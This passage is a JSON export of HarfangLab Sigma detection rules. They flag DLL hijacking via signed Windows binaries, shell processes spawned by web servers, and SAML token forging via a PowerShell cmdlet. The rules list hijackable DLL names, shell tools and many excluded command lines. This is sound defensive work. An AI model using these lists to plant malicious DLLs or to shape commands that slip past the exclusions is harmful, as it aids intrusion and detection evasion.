"content": "title: DLL Hijacking via pnpunattend.exe\nid: f99772ac-fdaa-4cf6-9c2b-59afab8387e9\ndescription: |\n Detects potential Windows DLL Hijacking via pnpunattend.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pnpunattend.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\DEVRTL.dll'\n - '\\newdev.dll'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f99772ac-fdaa-4cf6-9c2b-59afab8387e9",
"rule_name": "DLL Hijacking via pnpunattend.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pnpunattend.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f9ee660e-81ec-4e3b-9897-8e9e23dba22b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072044Z",
"creation_date": "2026-03-23T11:45:34.072046Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072050Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_windows_webshell.yml",
"content": "title: Shell Process Spawned by Web Server\nid: f9ee660e-81ec-4e3b-9897-8e9e23dba22b\ndescription: |\n Detects the suspicious invocation of a shell process by a web server\n Attackers can use vulnerabilities present in web applications to execute malicious code on a web server.\n Is is recommended to analyze the executed shell command to determine its legitimacy in the context of the running web application.\nreferences:\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2021/04/01\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n ParentImage|endswith:\n - '\\w3wp.exe' # IIS\n - '\\httpd.exe' # Apache\n - '\\nginx.exe'\n - '\\php-cgi.exe'\n - '\\tomcat.exe'\n # C:\\Program Files\\Tomcat\\bin\\tomcat7.exe\n # C:\\Program Files\\Tomcat\\bin\\tomcat8.exe\n # C:\\Program Files\\Apache Software Foundation\\Tomcat 9.0\\bin\\Tomcat9.exe\n - '\\tomcat?.exe'\n # C:\\Program Files\\Tomcat\\bin\\tomcat7w.exe\n - '\\tomcat??.exe'\n # https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html\n - '\\UMWorkerProcess.exe' # ProxyLogon vulnerability\n - '\\ws_TomcatService.exe' # VMware Horizon exploitation (https://twitter.com/redcanary/status/1482100290698375169)\n selection_2:\n - Image|endswith:\n - '\\cmd.exe'\n - '\\command.com'\n - '\\powershell.exe'\n - '\\pwsh.exe' # PowerShell 6+\n - '\\bitsadmin.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\rundll32.exe'\n # cygwin or WSL\n - '\\sh.exe'\n - '\\bash.exe'\n # handle renamed binaries\n - OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'pwsh.dll' # related to pwsh.exe 
(PowerShell 6)\n - 'wscript.exe'\n - 'cscript.exe'\n - 'RUNDLL32.EXE'\n\n exclusion_fp:\n CommandLine:\n - 'cmd.exe /c echo %windir%'\n - 'CMD /C wmic os get Caption /value'\n - 'cmd.exe /s /c CMD /D /C powershell [System.Text.Encoding]::Default'\n - 'cmd.exe /c tasklist /FI PID eq * /FO CSV /NH'\n - 'cmd.exe /s /c echo EXEC'\n - 'cmd.exe /s /c for %F in * do @echo %~zF'\n - 'cmd.exe /c wmic NICCONFIG get DNSServerSearchOrder /format:CSV'\n\n exclusion_exchange_owa:\n # \"cmd.exe\" /c ver\n CommandLine: '?cmd.exe? /c ver'\n # parent commandline : c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangeOWAAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipm0c0ece8b-b171-4c37-b00b-f7ae3736eed0 -h \"C:\\inetpub\\temp\\apppools\\MSExchangeOWAAppPool\\MSExchangeOWAAppPool.config\" -w \"\" -m 0\n ParentCommandLine|contains: 'MSExchangeOWAAppPool'\n\n exclusion_fortinet:\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c ver'\n ParentImage: '?:\\Program Files (x86)\\Fortinet\\FortiClientEMS\\Apache24\\bin\\httpd.exe'\n\n exclusion_mcafee_epo:\n ParentImage: '?:\\Program Files (x86)\\McAfee\\ePolicy Orchestrator\\Server\\bin\\tomcat?.exe'\n # cmd.exe /c chcp 1252 > NUL & powershell.exe -ExecutionPolicy Bypass -NoExit -NoProfile -Command -\n CommandLine: 'cmd.exe /c chcp 1252 > NUL & powershell.exe -ExecutionPolicy Bypass -NoExit -NoProfile -Command -'\n\n exclusion_cti_server:\n # cwd : D:\\cti_server\\conf\\caddy\\sites-enabled\\iCTI_314\\modules\\rh\\\n CommandLine:\n - 'cmd.exe /c git describe 2>&1'\n - 'cmd.exe /c git status --porcelain'\n\n exclusion_sygid5:\n CommandLine: 'cmd.exe /c ipconfig /all'\n CurrentDirectory: '*\\sygid5*'\n\n exclusion_iagona:\n # cmd.exe /c C:/iagona/www/neoscreen/rest/apk/aapt.exe dump badging C:/iagona/www/neoscreen/rest/apk/app-release.apk\n # cmd.exe /s /c C:/iagona/www/neoscreen/rest/apk/aapt.exe dump badging 
C:/iagona/www/neoscreen/rest/apk/app-release.apk\n # cmd.exe /c E:/iagona/www/neoscreen/rest/apk/aapt.exe dump badging E:/iagona/www/neoscreen/rest/apk/app-release.apk\n CommandLine|endswith: ':/iagona/www/neoscreen/rest/apk/aapt.exe dump badging ?:/iagona/www/neoscreen/rest/apk/app-release.apk'\n\n exclusion_rotatelogs:\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /C bin\\rotatelogs *'\n - '?:\\Windows\\system32\\cmd.exe /C bin\\rotatelogs.exe *'\n - '?:\\Windows\\system32\\cmd.exe /C *\\bin\\rotatelogs.exe *'\n - '?:\\Windows\\system32\\cmd.exe /C {SRVROOT}\\bin\\rotatelogs.exe *'\n\n # https://twitter.com/SBousseaden/status/1408787624060506113\n exclusion_third_party:\n CommandLine:\n - '*\\rundll32.exe --eoim'\n - '*\\rundll32.exe --enable-speech-input --auto-scan-plugin --enable-media-stream*'\n - '*\\rundll32.exe --enable-speech-input --auto-scan-plugin --lang=* --enable-media-stream*'\n\n exclusion_sendmail:\n CommandLine:\n - 'cmd.exe /s /c sendmail.exe'\n - 'cmd.exe /s /c ?:\\xampp\\sendmail\\sendmail.exe'\n - 'cmd.exe /c *\\sendmail\\sendmail.exe -t'\n - 'cmd.exe /c /usr/sbin/sendmail -oi -f*@* -t'\n\n exclusion_php:\n CommandLine:\n - 'cmd.exe /c */bin/php/php?.?.??/php.exe -r print^(var_export^(get_loaded_extensions^(^),true^)^)^;'\n - 'cmd.exe /c */bin/php/php?.?.??/php.exe -c */bin/php.ini -r print^(var_export^(get_loaded_extensions^(^),true^)^)^;'\n - 'cmd.exe /s /c */bin/php/php?.?.??/php.exe -r print^(var_export^(get_loaded_extensions^(^),true^)^)^;'\n - 'cmd.exe /s /c */bin/php/php?.?.??/php.exe -c */bin/php.ini -r print^(var_export^(get_loaded_extensions^(^),true^)^)^;'\n\n exclusion_tomcat:\n CommandLine:\n - 'sh *\\GRANGLE\\\\*\\tomcat\\\\*'\n - 'sh.exe *\\GRANGLE\\\\*\\tomcat\\\\*'\n - 'cmd.exe /C cscript.exe ?:\\Program Files\\Apache Software Foundation\\Tomcat*\\temp\\service*.vbs'\n\n exclusion_magicinfo:\n CommandLine|startswith: 'cmd /c copy *\\MagicInfo Premium\\runtime'\n\n exclusion_dakota:\n CommandLine: 'cmd /c powershell 
-ExecutionPolicy RemoteSigned -noprofile -noninteractive Get-WebBinding -Name Dakota -Protocol https | select -ExpandProperty bindingInformation'\n\n exclusion_vmware:\n CommandLine|startswith: 'cmd /c VMwareToolboxCmd.exe stat'\n\n exclusion_converters:\n CommandLine|startswith:\n - 'cmd.exe /c pdftk '\n - 'cmd.exe /c pdftk.exe '\n - 'cmd.exe /s /c pdftk '\n - 'cmd.exe /s /c pdftk^ '\n - 'cmd.exe /s /c pdftk.exe '\n - 'cmd.exe /c ffmpeg '\n - 'cmd.exe */c *\\wkhtmltopdf.exe '\n - 'cmd.exe */c */wkhtmltopdf.exe '\n - 'cmd * /C */wkhtmltopdf.exe '\n - 'cmd.exe /c *ImageGen/ImageGen.exe'\n - 'cmd.exe /c imagemagick\\convert.exe '\n - 'cmd.exe /s /c */bin/ImageMagick*/convert '\n - 'cmd.exe /c ?:*Program Files*\\ImageMagick-*\\convert.exe '\n - 'cmd.exe /c ?:*Program Files (x86)*\\ImageMagick-*\\convert.exe '\n - 'cmd.exe /c convert -version'\n - 'cmd.exe /c pdfinfo -v 2>&1'\n - '*cmd.exe /c ?:\\Program Files\\Vital Images\\\\*\\bin\\\\*Converter.bat'\n - 'cmd.exe /c *\\iCTI_convert_druide.exe '\n - 'cmd.exe /c \"?:\\Program Files\\ImageMagick-*\\convert.exe'\n - 'cmd.exe /c \"?:\\Program Files (x86)\\ImageMagick-*\\convert.exe'\n - 'cmd.exe /c *\\ImageMagick-*\\montage.exe'\n - 'cmd.exe /c ?:\\Program Files\\LibreOffice\\program\\python ?:\\Program Files\\LibreOffice\\program\\unoconv.py'\n - 'cmd.exe /c */bin/pdftk.exe '\n - 'cmd.exe /c java * ?:\\Program Files\\pdfsam\\lib\\pdfsam*'\n - 'cmd.exe /c java * ?:\\Program Files (x86)\\pdfsam\\lib\\pdfsam*'\n - 'cmd.exe /c *\\converter\\iconv.exe'\n # - 'cmd.exe /c where *convert'\n\n exclusion_ssafe:\n CommandLine|startswith: 'cmd.exe /s /c schtasks /Create /tn SSafe_RSTART /tr ?:\\Windows\\TEMP/_ssf_svc_.bat'\n\n exclusion_loaded_extension_monitoring:\n CommandLine|contains: 'print^(var_export^(get_loaded_extensions^(^),true^)^)^;'\n\n exclusion_backup:\n CommandLine: 'cmd.exe /s /c mysqldump'\n\n exclusion_delete_schtasks:\n CommandLine|startswith: 'cmd.exe /s /c schtasks /delete /TN'\n\n exclusion_neoplayer:\n 
CommandLine|startswith: 'cmd.exe /c */neoplayer/rest/apk/aapt.exe dump'\n\n exclusion_swish_e:\n CommandLine: 'cmd.exe /c *\\SWISH-E\\bin\\swish-e.exe -f *'\n\n exclusion_thumbnailer:\n CommandLine|startswith: 'cmd.exe /c evince-thumbnailer '\n\n exclusion_tmp_cleanup:\n CommandLine:\n - '?:\\windows\\system32\\cmd.exe /C del /S /Q ?:\\windows\\TEMP\\tmp_*.ps1xml'\n - '?:\\windows\\system32\\cmd.exe /C del /S /Q ?:\\windows\\TEMP\\tmp_*.psd1'\n - '?:\\windows\\system32\\cmd.exe /C del /S /Q ?:\\windows\\TEMP\\tmp_*.psm1'\n\n exclusion_soffice:\n CommandLine: 'cmd /C tasklist | find soffice'\n\n exclusion_t2ttechnologies:\n CommandLine|startswith: 'cmd.exe /c ?:\\Program Files\\T2Technology\\T2MasterPrint\\'\n\n exclusion_berger_levrault:\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /c *\\Berger-Levrault\\\\*\\server_dsn-val_*.bat*.dsn *\\eGRH\\Fusions\\\\* */Berger-Levrault/*'\n - '?:\\Windows\\system32\\cmd.exe /c *\\Berger-Levrault\\\\*\\server_jps.bat */Berger-Levrault/*'\n\n\n exclusion_pipelog:\n CommandLine: '?:\\Windows\\system32\\cmd.exe /C bin\\pipelog.exe httpd_*'\n\n exclusion_medifirst_genetics:\n CommandLine|contains|all:\n - 'cmd.exe /c java'\n - '/mdfapp/genetics'\n - '/mdf/var/medifirst_genetics/'\n\n exclusion_urouter:\n CommandLine|startswith: 'CMD /C wmic process where (name=userver.exe or name=urouter.exe)'\n\n exclusion_hexaflux:\n CommandLine:\n - 'cmd /c sc query hexaflux_console.exe'\n - 'cmd /c sc query hexaflux'\n\n exclusion_incotec:\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c *\\IncoRunEnv.bat VcmRptJob.exe * /Inco_Identity:*'\n\n exclusion_quadientmas:\n CommandLine|startswith:\n - 'cmd.exe /c ?:\\Program Files (x86)\\QuadientMAS\\services\\'\n - 'cmd.exe /c ?:/Program Files (x86)/QuadientMAS/services/'\n - 'cmd.exe /c icacls ?:\\Program Files (x86)\\QuadientMAS\\data\\user* /t /grant'\n\n exclusion_neomas:\n CommandLine|startswith: 'cmd.exe /c ?:/Program Files (x86)/NeopostMAS/'\n\n exclusion_wamp:\n CommandLine: 'cmd.exe 
/c CMD /D /C powershell [System.Text.Encoding]::Default'\n\n exclusion_cvi42:\n GrandparentImage|endswith: '\\httpd.exe'\n ParentImage|endswith: '\\php-cgi.exe'\n CommandLine|contains: '?:\\Program Files\\cvi42\\report\\\\???\\'\n\n exclusion_aras_innovator:\n CommandLine: 'cmd.exe /c node updateOrCompile.js'\n CurrentDirectory|endswith: '\\Aras\\PRD\\Innovator\\Client\\nodejs\\'\n\n exclusion_ovidentia:\n CurrentDirectory: '?:\\inetpub\\wwwroot\\ovidentia\\'\n CommandLine:\n - 'cmd.exe /c ffmpeg -version > /dev/null 2>&1'\n - 'cmd.exe /c pdfinfo -v 2>&1'\n - 'cmd.exe /c convert -version'\n\n exclusion_ifilter:\n CommandLine: 'cmd.exe /s /c *\\iFilterConsole64.exe -f *.pdf'\n\n exclusion_carl:\n CommandLine:\n - 'cmd /s /c icacls *\\CSAdmin\\tmp\\tmp_*\\\\* /GRANT:r *'\n - 'cmd /s /c DEL *\\CSAdmin\\tmp\\tmp_*\\\\* 1>nul & RMDIR /S /Q *\\CSAdmin\\tmp\\tmp_*\\\\*'\n - 'cmd /s /c *\\bin\\java -classpath *\\CSAdmin/distrib/work\\carlsource/*/install/lib/*com.carl.xnet.starter.ObfuscatorCli*'\n\n exclusion_rtm:\n CommandLine:\n - 'cmd.exe /c sc query RTM Historian | FIND STATE'\n - 'cmd.exe /c sc query RTM RTMReporter | FIND STATE'\n - 'cmd.exe /c sc query RTM Scheduler | FIND STATE'\n - 'cmd.exe /c sc stop RTM RTMReporter'\n\n exclusion_openbee:\n CommandLine|startswith: 'cmd.exe /c ?:\\Program Files (x86)\\OpenBee\\OpenBeePortal*\\Apache*\\'\n\n exclusion_sap:\n CommandLine|startswith: 'cmd /c icacls ?:\\Program Files (x86)\\SAP\\SAP Business One ServerTools\\SCSWWorkingShare'\n\n exclusion_talentia:\n CommandLine|startswith: 'cmd.exe /c *\\Talentia\\portailDsn\\\\*\\webapps\\portailDsn\\WEB-INF\\classes'\n\n exclusion_userver:\n CommandLine|startswith: 'CMD /C wmic process where name=userver.exe get commandline '\n\n exclusion_jalios_cms:\n # https://community.jalios.com/jcms/jc2_183627/fr/script-pdf2svg2-bat?details=true\n # C:\\Windows\\system32\\cmd.exe /c C:\\Tools\\poppler-0.68\\bin\\pdf2svg2.bat....\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c 
*poppler*\\bin\\pdf2svg2.bat *'\n\n exclusion_mdfapp:\n # https://github.com/mpdf/mpdf\n CommandLine|contains: '/c /mdf/app/php/bin/php ?:/mdf/mdfapp/genetics/modules/*/stringToBarCode.php'\n\n exclusion_kayleigh:\n CommandLine:\n - 'cmd.exe /c sc query KayleighUniSpooler'\n - 'cmd.exe /c sc query KayleighSPSpooler'\n - 'cmd.exe /c sc query KayleighApacheServer'\n - 'cmd.exe /c sc query KayleighPostgresServer'\n - 'cmd.exe /c sc query KayleighJavaServer'\n\n exclusion_cron:\n CommandLine:\n - 'cmd.exe /s /c ?:\\php\\php-*-nts\\\\php.exe -f ?:/inetpub/wwwroot/logen/library/cron/cron.php ajax'\n - 'cmd.exe /s /c cd c:/inetpub/wwwroot/logen/library/cron/'\n\n condition: all of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Some web applications may spawn a legitimate shell process.\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f9ee660e-81ec-4e3b-9897-8e9e23dba22b",
"rule_name": "Shell Process Spawned by Web Server",
"rule_description": "Detects the suspicious invocation of a shell process by a web server.\nAttackers can use vulnerabilities present in web applications to execute malicious code on a web server.\nIt is recommended to analyze the executed shell command to determine its legitimacy in the context of the running web application.\n",
"rule_creation_date": "2021-04-01",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fa2fd701-99ae-44c4-bb90-1f638c009d14",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082150Z",
"creation_date": "2026-03-23T11:45:34.082152Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082157Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_customshellhost.yml",
"content": "title: DLL Hijacking via CustomShellHost.exe\nid: fa2fd701-99ae-44c4-bb90-1f638c009d14\ndescription: |\n Detects potential Windows DLL Hijacking via CustomShellHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CustomShellHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\propsys.dll'\n - '\\sspicli.dll'\n - '\\userenv.dll'\n - '\\wtsapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fa2fd701-99ae-44c4-bb90-1f638c009d14",
"rule_name": "DLL Hijacking via CustomShellHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CustomShellHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fa33082b-e331-43b5-b919-98c770258fc9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078365Z",
"creation_date": "2026-03-23T11:45:34.078366Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078371Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1606.002/T1606.002.md#atomic-test-1---golden-saml",
"https://attack.mitre.org/techniques/T1606/002/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1606_002_saml_forged_token.yml",
"content": "title: SAML Token Forged via PowerShell\nid: fa33082b-e331-43b5-b919-98c770258fc9\ndescription: |\n Detects the usage of a PowerShell cmdlet related to SAML token forging.\n An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\n They may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account.\n It is recommended to analyze the process responsible for the forging of token as well as its ancestors for malicious content, and to look for other suspicious activities and authentications following this alert.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1606.002/T1606.002.md#atomic-test-1---golden-saml\n - https://attack.mitre.org/techniques/T1606/002/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/12/23\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1606.002\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1550\n - attack.t1550.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n # cmdlet to forge the token\n PowershellCommand|contains: 'New-AADIntSAMLToken '\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fa33082b-e331-43b5-b919-98c770258fc9",
"rule_name": "SAML Token Forged via PowerShell",
"rule_description": "Detects the usage of a PowerShell cmdlet related to SAML token forging.\nAn adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\nThey may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account.\nIt is recommended to analyze the process responsible for the forging of the token as well as its ancestors for malicious content, and to look for other suspicious activities and authentications following this alert.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1550",
"attack.t1550.001",
"attack.t1606.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fa405235-fe36-482e-8102-ba29c2a94699",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082463Z",
"creation_date": "2026-03-23T11:45:34.082466Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082470Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tracerpt.yml",
"content": "title: DLL Hijacking via TraceRpt.exe\nid: fa405235-fe36-482e-8102-ba29c2a94699\ndescription: |\n Detects potential Windows DLL Hijacking via TraceRpt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'TraceRpt.Exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\pdh.dll'\n - 